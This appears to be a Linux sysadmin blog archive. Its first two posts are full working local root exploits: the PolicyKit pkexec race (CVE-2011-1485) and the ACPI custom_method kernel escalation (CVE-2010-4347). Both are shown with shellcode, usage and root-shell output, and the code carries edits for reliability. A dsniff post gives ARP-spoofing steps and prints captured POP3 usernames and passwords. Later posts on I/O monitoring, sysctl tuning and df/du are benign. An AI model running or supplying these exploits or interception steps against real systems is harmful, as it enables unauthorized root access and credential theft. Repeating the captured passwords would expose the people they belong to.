Oct 06

/* polkit-pwnage.c
*
*
* ==============================
* =      PolicyKit Pwnage      =
* =          by zx2c4          =
* =        Sept 2, 2011        =
* ==============================
*
*
* Howdy folks,
*
* This exploits CVE-2011-1485, a race condition in PolicyKit.
*
* davidz25 explains:
*
* --begin--
* Briefly, the problem is that the UID for the parent process of pkexec(1) is
* read from /proc by stat(2)’ing /proc/PID. The problem with this is that
* this returns the effective uid of the process which can easily be set to 0
* by invoking a setuid-root binary such as /usr/bin/chsh in the parent
* process of pkexec(1). Instead we are really interested in the real-user-id.
* While there’s a check in pkexec.c to avoid this problem (by comparing it to
* what we expect the uid to be – namely that of the pkexec.c process itself which
* is the uid of the parent process at pkexec-spawn-time), there is still a short
* window where an attacker can fool pkexec/polkitd into thinking that the parent
* process has uid 0 and is therefore authorized. It’s pretty hard to hit this
* window – I actually don’t know if it can be made to work in practice.
* --end--
*
* Well, here is, in fact, how it’s made to work in practice. There is as he said an
* attempted mitigation, and the way to trigger that mitigation path is something
* like this:
*
*     $ sudo -u `whoami` pkexec sh
*     User of caller (0) does not match our uid (1000)
*
* Not what we want. So the trick is to execl to a suid at just the precise moment
* /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed,
* and execl to the suid binary as our very next instruction.
*
* ** Usage **
* $ pkexec --version
* pkexec version 0.101
* $ gcc polkit-pwnage.c -o pwnit
* $ ./pwnit
* [+] Configuring inotify for proper pid.
* [+] Launching pkexec.
* sh-4.2# whoami
* root
* sh-4.2# id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* sh-4.2#
*
* ** Targets **
* This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
* as of writing uses 0.101, has backported 0.102's bug fix. A way to check
* this is by looking at the mtime of /usr/bin/pkexec — April 22, 2011 or
* later and you’re out of luck. It’s likely other distributions do the same.
* Fortunately, this exploit is clean enough that you can try it out without
* too much collateral.
*
*
* greets to djrbliss and davidz25.
*
* – zx2c4
* 2-sept-2011
*
*/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
 
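/*
 * Entry point.  Forks so that the race has two actors:
 *
 *   parent (pid P) - watches /proc/P with inotify and, the instant that
 *                    directory is accessed (pkexec stat(2)'ing it, see the
 *                    header comment), execs the setuid-root /usr/bin/chsh,
 *                    which makes P's *effective* uid 0 for as long as chsh
 *                    runs;
 *   child          - waits one second for the watch to be in place, then
 *                    execs pkexec, whose parent pid is P.
 *
 * read(fd, NULL, 0) on the inotify descriptor is used purely as a wake-up:
 * it blocks until an event is queued and then returns (a zero-length read
 * cannot deliver an event, so it returns an error without consuming it --
 * NOTE(review): that is the observed behaviour this exploit relies on;
 * confirm on the target kernel).  execl() must be the very next instruction
 * after that read; anything placed between them widens the window and the
 * race is lost.
 *
 * Changes from the original: fork() failure is detected instead of being
 * treated as "parent"; inotify setup failures are reported before stdio is
 * closed rather than perror()'d into a closed stderr; stdout is flushed
 * before fork()/exec so the banner is not lost or duplicated when stdout is
 * not a tty; snprintf() instead of sprintf().
 *
 * Returns 0 only if an execl() unexpectedly returns; exits 1 on setup
 * failure.
 */
int main(int argc, char **argv)
{
    pid_t pid;

    (void)argc;
    (void)argv;

    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=          by zx2c4         =\n");
    printf("=        Sept 2, 2011       =\n");
    printf("=============================\n\n");
    /* Neither close(1) nor execl() flushes stdio buffers: flush now so the
     * banner survives when stdout is a pipe or file. */
    fflush(stdout);

    pid = fork();
    if (pid < 0) {
        perror("[-] fork");
        return 1;
    }

    if (pid > 0) {
        /* Parent: the process pkexec will inspect through /proc/<ppid>. */
        int fd;
        char pid_path[64];

        snprintf(pid_path, sizeof pid_path, "/proc/%ld", (long)getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        fflush(stdout);

        /* Set the watch up while stderr is still open so a failure is
         * visible; the race cannot be attempted without it. */
        fd = inotify_init();
        if (fd < 0) {
            perror("[-] inotify_init");
            return 1;
        }
        if (inotify_add_watch(fd, pid_path, IN_ACCESS) < 0) {
            perror("[-] inotify_add_watch");
            return 1;
        }

        /* Drop stdio so chsh has no terminal to talk to and fails quickly
         * on its own instead of waiting for input. */
        close(0); close(1); close(2);

        /* Blocks until /proc/<pid> is accessed.  Keep execl() immediately
         * after it -- the whole exploit is this adjacency. */
        read(fd, NULL, 0);
        execl("/usr/bin/chsh", "chsh", NULL);
        /* Only reached if execl() failed; stdio is closed, nothing to report. */
        return 1;
    } else {
        /* Child: give the parent a moment to install the watch, then run
         * pkexec so that its parent pid is the watched process. */
        sleep(1);
        printf("[+] Launching pkexec.\n");
        fflush(stdout);
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
        perror("[-] execl pkexec");
        return 1;
    }
    return 0;
}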

Aug 04

   This custom_method file allows to inject custom ACPI methods into the ACPI interpreter tables. This control file was introduced with world writeable permissions in Linux Kernel 2.6.33.

/*
* american-sign-language.c
*
* Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347
*
*   This custom_method file allows to inject custom ACPI methods into the ACPI
*   interpreter tables. This control file was introduced with world writeable
*   permissions in Linux Kernel 2.6.33.
*
* Usage:
*
*   $ gcc american-sign-language.c -o american-sign-language
*   $ ./american-sign-language
*   [+] resolving required symbols…
*   [+] checking for world-writable custom_method…
*   [+] checking for an ACPI LID device…
*   [+] poisoning ACPI tables via custom_method…
*   [+] triggering ACPI payload via LID device…
*   [+] triggering exploit via futimesat…
*   [+] launching root shell!
*   # id
*   uid=0(root) gid=0(root) groups=0(root)
*
* Notes:
*
*   This vuln allows us to write custom ACPI methods and load them into the
*   kernel as an unprivileged user. We compile some fancy ASL down to AML
*   that overrides the ACPI method used when the status of the LID device is
*   queried (eg. ‘open’ or ‘closed’ lid on a laptop). When the method is
*   triggered, it overlays an OperationRegion on the physical address where
*   sys_futimesat is located and overwrites the memory via the Store to
*   escalate privileges whenever sys_futimesat is called.
*
*   The payload is 64-bit only and depends on the existence of a LID device
*   (eg. laptop), but the exploit will still tell you if you’re vulnerable
*   regardless. If you don’t know how to work around these limitations, you
*   probably shouldn’t be running this in the first place. :-P
*
*   Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/utsname.h>

/*
* The ASL payload looks like:
*
* DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0x00001001) {
*   Method (\_SB.LID._LID, 0, NotSerialized) {
*     OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)
*     Field(KMEM, AnyAcc, NoLock, Preserve) {
*       HACK, 0x392
*     }
*     Store (Buffer () {
*       0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,
*       0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,
*       0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,
*       0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
*       0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,
*       0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,
*       0xc3 }, HACK)
*     Return (One)
*   }
* }
*
* Feel free to `iasl -d` this if you don't trust me! ;-)
*/
#define PAYLOAD_AML \
"\x53\x53\x44\x54\x90\x00\x00\x00\x02\x3e\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x49\x4e\x54\x4c" \
"\x21\x05\x09\x20\x14\x4b\x06\x5c\x2f\x03\x5f\x53\x42\x5f\x4c\x49" \
"\x44\x5f\x5f\x4c\x49\x44\x00\x5b\x80\x4b\x4d\x45\x4d\x00\x0c\xe0" \
"\x61\x17\x01\x0b\x92\x03\x5b\x81\x0c\x4b\x4d\x45\x4d\x00\x48\x41" \
"\x43\x4b\x42\x39\x70\x11\x34\x0a\x31\x55\x48\x89\xe5\x53\x48\x83" \
"\xec\x08\x48\xc7\xc3\x24\x24\x24\x24\x48\xc7\xc0\x24\x24\x24\x24" \
"\xbf\x00\x00\x00\x00\xff\xd0\x48\x89\xc7\xff\xd3\x48\xc7\xc0\xb7" \
"\xff\xff\xff\x48\x83\xc4\x08\x5b\xc9\xc3\x48\x41\x43\x4b\xa4\x01"
#define PAYLOAD_LEN 144

#define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"
#define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"

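/*
 * scan_symtab - look for @name in one symbol table stream.
 * @f:        open table ("addr type name [module]" lines, or "addr name"
 *            lines when @oldstyle is set)
 * @name:     symbol to find
 * @oldstyle: 1 for the two-column /proc/ksyms layout, 0 for kallsyms /
 *            System.map
 * @out:      receives the address when found
 *
 * In the old-style layout, entries containing "_O/" or "_S." are skipped
 * and a trailing "_Rsmp_<ver>"-style modversion suffix is stripped before
 * comparing.  A line whose first field is not a hex number (for example the
 * "[module]" column left over from the previous line) is skipped one token
 * at a time.
 *
 * Returns 1 and sets *@out when the symbol is found, 0 otherwise.
 */
static int
scan_symtab(FILE *f, const char *name, int oldstyle, unsigned long *out)
{
    unsigned long addr = 0;
    char type;
    char sname[512];
    int ret = 0;

    while (ret != EOF) {
        if (!oldstyle) {
            ret = fscanf(f, "%lx %c %511s\n", &addr, &type, sname);
        } else {
            ret = fscanf(f, "%lx %511s\n", &addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                p = strrchr(sname, '_');
                if (p > sname + 5 && !strncmp(p - 3, "smp", 3)) {
                    p -= 4;
                    while (p > sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            /* first field was not an address: drop one token and retry */
            if (fscanf(f, "%511s\n", sname) == EOF)
                break;
            continue;
        }
        if (ret > 0 && !strcmp(name, sname)) {
            *out = addr;
            return 1;
        }
    }
    return 0;
}

/*
 * get_symbol - resolve a kernel symbol to its address.
 * @name: symbol name, e.g. "commit_creds".
 *
 * Sources tried, in order: /proc/kallsyms, then the pre-2.6 /proc/ksyms,
 * then /boot/System.map-$(uname -r), which is parsed in the two-column
 * layout when /proc/ksyms was used or when the running kernel is not 2.6.
 *
 * Returns the address, or 0 when the symbol is not found in any source.
 * NOTE(review): a kernel that hides addresses from unprivileged readers
 * (kptr_restrict prints them as 0) also yields 0, which callers in this file
 * correctly treat as "not found".
 *
 * Changes from the original: the garbled quote/dash characters the page
 * showed in the suffix-stripping code (which made it non-compilable) are
 * restored, the %s conversions are bounded to the 512-byte buffer, %lx is
 * used instead of %p for the address, and the path is built with snprintf.
 */
unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr = 0;
    char path[512];
    struct utsname ver;
    int oldstyle = 0;
    int found;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f != NULL)
            oldstyle = 1;
    }
    if (f != NULL) {
        found = scan_symtab(f, name, oldstyle, &addr);
        fclose(f);
        if (found)
            return addr;
    }

    /* Fall back to the System.map matching the running kernel. */
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    snprintf(path, sizeof path, "/boot/System.map-%s", ver.release);
    f = fopen(path, "r");
    if (f == NULL)
        return 0;
    found = scan_symtab(f, name, oldstyle, &addr);
    fclose(f);
    return found ? addr : 0;
}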

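/*
 * Entry point: resolve symbols, verify preconditions, patch and load the AML
 * payload, trigger it, and spawn a shell.
 *
 *   1. sys_futimesat, prepare_kernel_cred and commit_creds are resolved with
 *      get_symbol(); any miss aborts, since the payload is built from them.
 *   2. CUSTOM_METHOD must exist and be world-writable (that is the bug), and
 *      HEY_ITS_A_LID must exist: the payload replaces the LID device's _LID
 *      method, and reading the state file is what invokes it.
 *   3. The three addresses are patched into the AML blob, which is written
 *      to custom_method and then executed by reading the LID state.
 *   4. futimesat() is called.  The payload has overwritten the start of
 *      sys_futimesat with code that installs root credentials and returns
 *      -EDOTDOT, so errno == EDOTDOT is the signature of success.
 *
 * Exits 1 with a message at the first failing step.  On success execl()
 * replaces the process with /bin/sh, so main() does not return normally.
 *
 * NOTE(review): glibc only declares futimesat() under _GNU_SOURCE (or
 * _DEFAULT_SOURCE on newer glibc); add `#define _GNU_SOURCE` before the
 * includes if the compiler reports an implicit declaration.
 *
 * Changes from the original: fopen() results are checked before use, the
 * custom_method write is verified (fwrite count and fclose), fread() gets the
 * array rather than its address, and a failed execl() is reported.
 */
int
main(int argc, char **argv)
{
    int ret;
    FILE *fp;
    char buf[64];
    struct stat sb;
    char payload[PAYLOAD_LEN] = PAYLOAD_AML;
    unsigned long sys_futimesat, prepare_kernel_cred, commit_creds;

    (void)argc;
    (void)argv;

    printf("[+] resolving required symbols…\n");

    sys_futimesat = get_symbol("sys_futimesat");
    if (!sys_futimesat) {
        printf("[-] sys_futimesat symbol not found, aborting!\n");
        exit(1);
    }

    prepare_kernel_cred = get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("[-] prepare_kernel_cred symbol not found, aborting!\n");
        exit(1);
    }

    commit_creds = get_symbol("commit_creds");
    if (!commit_creds) {
        printf("[-] commit_creds symbol not found, aborting!\n");
        exit(1);
    }

    printf("[+] checking for world-writable custom_method…\n");

    if (stat(CUSTOM_METHOD, &sb) < 0) {
        printf("[-] custom_method not found, kernel is not vulnerable!\n");
        exit(1);
    }

    if (!(sb.st_mode & S_IWOTH)) {
        printf("[-] custom_method not world-writable, kernel is not vulnerable!\n");
        exit(1);
    }

    printf("[+] checking for an ACPI LID device…\n");

    if (stat(HEY_ITS_A_LID, &sb) < 0) {
        printf("[-] ACPI LID device not found, but kernel is still vulnerable!\n");
        exit(1);
    }

    /* The embedded shellcode uses 64-bit encodings (REX.W movs); a 32-bit
     * build cannot use it. */
    if (sizeof(sys_futimesat) != 8) {
        printf("[-] payload is 64-bit only, but kernel is still vulnerable!\n");
        exit(1);
    }

    /*
     * The OperationRegion is SystemMemory, i.e. a physical address, so the
     * kernel text mapping base is stripped from the virtual address.  This
     * assumes text is mapped at 0xffffffff80000000 + phys with no
     * relocation (the kernels this targets; a relocated/KASLR kernel would
     * need a different translation).
     */
    sys_futimesat &= ~0xffffffff80000000;

    /*
     * Patch the blob in place (little-endian, low 32 bits of each value):
     *   byte 63  : operand of the DWordPrefix (0x0c) at byte 62 -- the
     *              region base, PHYADDR in the ASL above
     *   byte 101 : imm32 of "48 c7 c3" (mov $commit_creds, %rbx)
     *   byte 108 : imm32 of "48 c7 c0" (mov $prepare_kernel_cred, %rax)
     * Those movs sign-extend their imm32, so the low 32 bits of a
     * 0xffffffff8... address reproduce the full 64-bit value.
     */
    memcpy(&payload[63], &sys_futimesat, 4);
    memcpy(&payload[101], &commit_creds, 4);
    memcpy(&payload[108], &prepare_kernel_cred, 4);

    printf("[+] poisoning ACPI tables via custom_method…\n");

    fp = fopen(CUSTOM_METHOD, "w");
    if (fp == NULL) {
        perror("[-] cannot open custom_method for writing");
        exit(1);
    }
    /* stdio buffers the 144 bytes; fclose() issues the actual write, so its
     * result is what tells us whether the table was accepted. */
    if (fwrite(payload, 1, sizeof(payload), fp) != sizeof(payload) || fclose(fp) != 0) {
        printf("[-] writing the AML table to custom_method failed!\n");
        exit(1);
    }

    printf("[+] triggering ACPI payload via LID device…\n");

    fp = fopen(HEY_ITS_A_LID, "r");
    if (fp == NULL) {
        perror("[-] cannot open the LID state file");
        exit(1);
    }
    fread(buf, 1, sizeof(buf), fp);   /* contents unused; the read is the trigger */
    fclose(fp);

    printf("[+] triggering exploit via futimesat…\n");

    /* dirfd is ignored for an absolute path. */
    ret = futimesat(0, "/tmp", NULL);

    if (ret != -1 || errno != EDOTDOT) {
        printf("[-] unexpected futimesat errno, exploit failed!\n");
        exit(1);
    }

    if (getuid() != 0) {
        printf("[-] privileges not escalated, exploit failed!\n");
        exit(1);
    }

    printf("[+] launching root shell!\n");
    execl("/bin/sh", "/bin/sh", NULL);
    perror("[-] execl /bin/sh");
    return 1;
}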

Apr 07

dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g., due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI. Note that the active tools (arpspoof, dnsspoof, macof, sshmitm, webmitm) disrupt live traffic on the segment, and the passive ones capture credentials in clear text; use them only on networks you are authorized to test.

Home Page (http://monkey.org/~dugsong/dsniff/)

INSTALL Dsniff:

1. software list

libpcap-0.7.2.tar.gz

libnet-1.0.2a.tar.gz

libnids-1.18.tar.gz

dsniff-2.3.tar.gz

2. install gcc and openssl

yum -y install openssl gcc flex bison libpcap-devel libnet

3. install libnids

# tar zxvf libnids-1.18.tar.gz
# cd libnids-1.18
# ./configure
# make
# make install

4. install  dsniff

./configure --prefix=/usr --without-db

make

make install

   If your CentOS version is newer than 5.3 you can install it with yum instead:

yum install dsniff

5. Test dsniff

dsniff -n -i eth0

Output:

04/07/11 15:00:45 tcp 192.168.1.135.3791 -> 122.55.2.222.110 (pop3)
USER hr
PASS xxx123

—————–
04/07/11 15:01:19 tcp 192.168.1.196.4747 -> 122.55.2.222.110 (pop3)
USER cx
PASS chenxia1

—————–
04/07/11 15:01:20 tcp 192.168.1.134.2086 -> 122.55.2.222.110 (pop3)
USER aa-1@xxxx.com
PASS aa-11

—————–
04/07/11 15:01:44 tcp 192.168.1.150.3630 -> 122.55.2.222.110 (pop3)
USER aa-3@xxxx.com
PASS iker-31

5.1 Test 2 (urlsnarf -n -i eth1)

Output:

urlsnarf: listening on eth1 [tcp port 80 or port 8080 or port 3128]
192.168.1.75 – - [07/Apr/2011:15:07:11 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=89170&s=20 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"
192.168.1.75 – - [07/Apr/2011:15:07:12 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=71906&s=20 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"
192.168.1.137 – - [07/Apr/2011:15:07:13 +0800] "GET http://safeurl.maxthon.cn/data/config.dat HTTP/1.1" – - "-" "MxAgent"
192.168.1.75 – - [07/Apr/2011:15:07:13 +0800] "GET http://218.60.33.7/pos?f=f4v/8/74582008.h264_1.f4v&k=2mCVf5QX4RGNvGTweGoq15snchlv5&e=12334&s=0 HTTP/1.1" – - "http://www.cntingshu.com/js/player/TudouVideoPlayer_Homer_141.swf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.45 Safari/534.16"

5.3 ARP spoofing (sniffing on a switched network)

Enable IP forwarding first so that the intercepted traffic is relayed on to the real gateway; without it the target simply loses connectivity. The arpspoof line below poisons only the target's ARP entry for the gateway, so only the target's outbound traffic passes through this host (enough for the POP3 USER/PASS seen above); run a second arpspoof with the two addresses swapped if you also need the return direction. Only do this on networks you are authorized to test.

echo "1" > /proc/sys/net/ipv4/ip_forward

arpspoof -t 192.168.1.100 192.168.1.1

       Open a new terminal

dsniff -n -i eth1

Jan 18

Since Linux kernel 2.6.20 the kernel keeps per-process I/O statistics, so tools like iotop can monitor each process's I/O activity in real time, the way top shows a process's memory and CPU use. Kernels older than 2.6.20 are not so lucky; following an approach given in a Stack Overflow answer, VPSee wrote a simple Python script that prints per-process I/O on kernels < 2.6.20.

Kernel < 2.6.20

The idea is simple: the script enables the kernel's block_dump tracing, captures the output of dmesg, parses out each process's block reads and writes, and prints the statistics once a second. It must run as root (both block_dump and dmesg -c require it):

 

#!/usr/bin/python
# Monitoring per-process disk I/O activity
# written by Jason

import os
import re
import signal
import subprocess
import sys
import time

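class DiskIO:
    """Per-process block I/O counters accumulated from block_dump output.

    pname  -- task name as logged by the kernel (e.g. "kjournald")
    pid    -- pid as a string, exactly as matched from the dmesg line
    reads  -- number of READ lines seen for this pid
    writes -- number of WRITE lines seen for this pid
    """
    def __init__(self, pname=None, pid=None, reads=0, writes=0):
        self.pname = pname
        self.pid = pid
        # Honour the reads/writes arguments; they used to be accepted and
        # then silently discarded (always reset to 0).  Callers that omit
        # them, as main() does, see no difference.
        self.reads = reads
        self.writes = writes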

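def main():
    """Poll the kernel log once per second and print per-process block I/O.

    Enables /proc/sys/vm/block_dump (which makes the kernel log every block
    READ/WRITE with the issuing task name and pid), then loops: drain the
    ring buffer with ``dmesg -c``, count READ and WRITE lines per pid, sleep
    one second and print the table.  Runs until SIGINT, which signal_handler
    turns into a clean exit that switches block_dump off again.

    Must run as root: both block_dump and ``dmesg -c`` require it.
    """
    if len(sys.argv) != 1:
        print("usage: ./iotop")
        sys.exit(0)

    if os.getuid() != 0:
        print("must be run as root")
        sys.exit(0)

    signal.signal(signal.SIGINT, signal_handler)

    # Write the sysctl directly instead of os.system('echo 1 > ...'):
    # no shell involved, and a failure is not silently ignored.
    f = open('/proc/sys/vm/block_dump', 'w')
    try:
        f.write('1')
    finally:
        f.close()

    pattern = re.compile(r'^(\S+)\((\d+)\): (READ|WRITE) block (\d+) on (\S+)')

    print("TASK              PID       READ      WRITE")
    while True:
        # Read the ring buffer straight from a dmesg pipe.  The original ran
        # `dmesg -c > /tmp/diskio.log` through a shell as root, which on
        # kernels without fs.protected_symlinks lets any local user
        # pre-create /tmp/diskio.log as a symlink and have root truncate an
        # arbitrary file; there is no need for a temp file at all.
        proc = subprocess.Popen(['dmesg', '-c'], stdout=subprocess.PIPE)
        out = proc.communicate()[0]
        if not isinstance(out, str):
            out = out.decode('utf-8', 'replace')

        by_pid = {}
        order = []          # first-seen order, which is what gets printed
        for line in out.splitlines():
            m = pattern.match(line)
            if m is None:
                continue
            pname, pid, op = m.group(1), m.group(2), m.group(3)
            item = by_pid.get(pid)
            if item is None:
                item = DiskIO(pname, pid)
                by_pid[pid] = item
                order.append(item)
            # Count every matched line, including the first one for a pid;
            # the original appended a new entry without counting its event,
            # so each process came out one event short.
            if op == "READ":
                item.reads = item.reads + 1
            elif op == "WRITE":
                item.writes = item.writes + 1

        time.sleep(1)
        for item in order:
            print("%-10s %10s %10d %10d" % \
                (item.pname, item.pid, item.reads, item.writes))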

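def signal_handler(signal, frame):
    """SIGINT handler: switch block_dump back off and exit with status 0.

    Writes the sysctl directly rather than through a shell (the original
    used os.system('echo 0 > ...')).  A failure to restore it is ignored so
    the exit still happens, which matches the original's best-effort
    behaviour where the shell's exit status was never looked at.
    """
    try:
        f = open('/proc/sys/vm/block_dump', 'w')
        try:
            f.write('0')
        finally:
            f.close()
    except (IOError, OSError):
        pass
    sys.exit(0)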

# Run the monitor only when executed as a script, not when imported.
if __name__ == '__main__':
    main()

Kernel >= 2.6.20

If you want to use iotop to view per-process I/O activity in real time, you need to download and build a newer kernel (2.6.20 or later), compiled with the TASK_DELAY_ACCT and TASK_IO_ACCOUNTING options enabled. Extract the kernel and enter the configuration interface:

# tar jxvf linux-2.6.30.5.tar.bz2
# mv linux-2.6.30.5 /usr/src/
# cd /usr/src/linux-2.6.30.5

# make menuconfig

Select Kernel hacking -> Collect scheduler debugging info and Collect scheduler statistics, save the configuration and compile the kernel:

# make; make modules; make modules_install; make install

Edit the grub configuration so that the new kernel is recognized and boots correctly:

# vi /boot/grub/menu.lst

Besides the new kernel, iotop also needs Python 2.5 or later, so if the system has Python 2.4 you need to download and install a newer Python. Here it is compiled and installed from source:

# tar jxvf Python-2.6.2.tar.bz2
# cd Python-2.6.2
# ./configure
# make; make install

Do not forget to download setuptools:

# mv setuptools-0.6c9-py2.6.egg.sh setuptools-0.6c9-py2.6.egg
# sh setuptools-0.6c9-py2.6.egg

More

For more about block_dump, see the article on monitoring Linux process I/O in real time. Note that block_dump makes the kernel log a line for every block I/O request, which can flood the system log; that is why it is best to stop the klogd process while block_dump is enabled.

Mar 08

Tuning kernel parameters can improve Linux socket I/O performance. The sysctl.conf settings below apply to Fedora, Red Hat and CentOS as well as other Linux distributions. They are meant to improve server network performance and give a little protection against DDoS attacks. Review them before applying: the listing repeats some entries with conflicting values (log_martians is set to 0 and later to 1, and the later line wins), and a few of the "performance" settings, such as disabling TCP window scaling, SACK and timestamps, actually reduce throughput on modern links.

# Kernel sysctl configuration file for Red Hat Linux
#
# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.

# Disables packet forwarding
net.ipv4.ip_forward=0

# Disables IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0

# Logging of spoofed / source-routed / redirected ("martian") packets -- disabled (0) here for these interfaces, but net.ipv4.conf.all.log_martians is set to 1 further down and the kernel ORs "all" with the per-interface value, so logging ends up enabled; keep one consistent setting
net.ipv4.conf.all.log_martians = 0
net.ipv4.conf.lo.log_martians = 0
net.ipv4.conf.eth0.log_martians = 0

# Disables IP source routing (this block and the two that follow repeat the settings above verbatim; harmless, but redundant)
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0

# Disables the magic-sysrq key
kernel.sysrq = 0

# Decrease the time default value for tcp_fin_timeout connection
net.ipv4.tcp_fin_timeout = 15

# Decrease the time default value for tcp_keepalive_time connection
net.ipv4.tcp_keepalive_time = 400

# Turn off tcp_window_scaling -- CAUTION: this caps the TCP window at 64 KiB and can badly limit throughput on fast or high-latency links; keep it enabled (1) unless you have a specific reason
net.ipv4.tcp_window_scaling = 0

# Turn off tcp_sack -- CAUTION: without selective ACK, recovery from packet loss is much slower; rarely a win
net.ipv4.tcp_sack = 0

# Turn off tcp_timestamps -- CAUTION: this also disables PAWS (protection against wrapped sequence numbers on fast links); the uptime-leak argument rarely justifies it
net.ipv4.tcp_timestamps = 0

# Enable TCP SYN Cookie Protection
net.ipv4.tcp_syncookies = 1

# Lower syn retry rates
net.ipv4.tcp_synack_retries = 2
net.ipv4.tcp_syn_retries = 3

# Enable ignoring broadcasts request
net.ipv4.icmp_echo_ignore_broadcasts = 1

# Enable bad error message Protection
net.ipv4.icmp_ignore_bogus_error_responses = 1

# Log Spoofed Packets, Source Routed Packets, Redirect Packets (overrides the log_martians = 0 set for "all" earlier in this file; the last value written wins)
net.ipv4.conf.all.log_martians = 1

# Size of the SYN backlog queue (effectively, q0). 1024 is a common default, so this may not be an increase; raise it further on busy servers, and keep tcp_syncookies = 1 so the queue cannot be exhausted by a SYN flood.
net.ipv4.tcp_max_syn_backlog = 1024

# Increase the tcp-time-wait buckets pool size
net.ipv4.tcp_max_tw_buckets = 1440000

# Allowed local port range (ports are 16-bit, so the upper bound must be at most 65535; a value of 65536 is rejected by the kernel)
net.ipv4.ip_local_port_range = 16384 65535

Mar 07

To get a summary of the available and used disk space on your Linux system, type the df command in a terminal window. The name df stands for "disk free". With the -h option (df -h) it shows the disk space in "human readable" form, which in this case means it prints the units along with the numbers.

The output of the df command is a table with six columns. The first column contains the file system, which can be a hard disk partition or another storage device, or a file system connected over the network. The next columns show the capacity of that file system, the space used, the space available and the percentage used, and the last column shows the path on which that file system is mounted. The mount point is the place in the directory tree where you can find and access that file system.

The du command on the other hand shows the disk space used by the files and directories in the current directory. Again the -h option (du -h) makes the output easier to comprehend.

By default, the du command lists all subdirectories to show how much disk space each one occupies. This can be avoided with the -s option (du -h -s), which only shows a summary, namely the combined disk space used by all subdirectories. If you want to show the disk usage of a directory (folder) other than the current directory, simply put that directory name as the last argument. For example: du -h -s website, where "website" is a subdirectory of the current directory.

Mar 05

 

Installing a DHCP server on Debian Linux is not that hard actually…

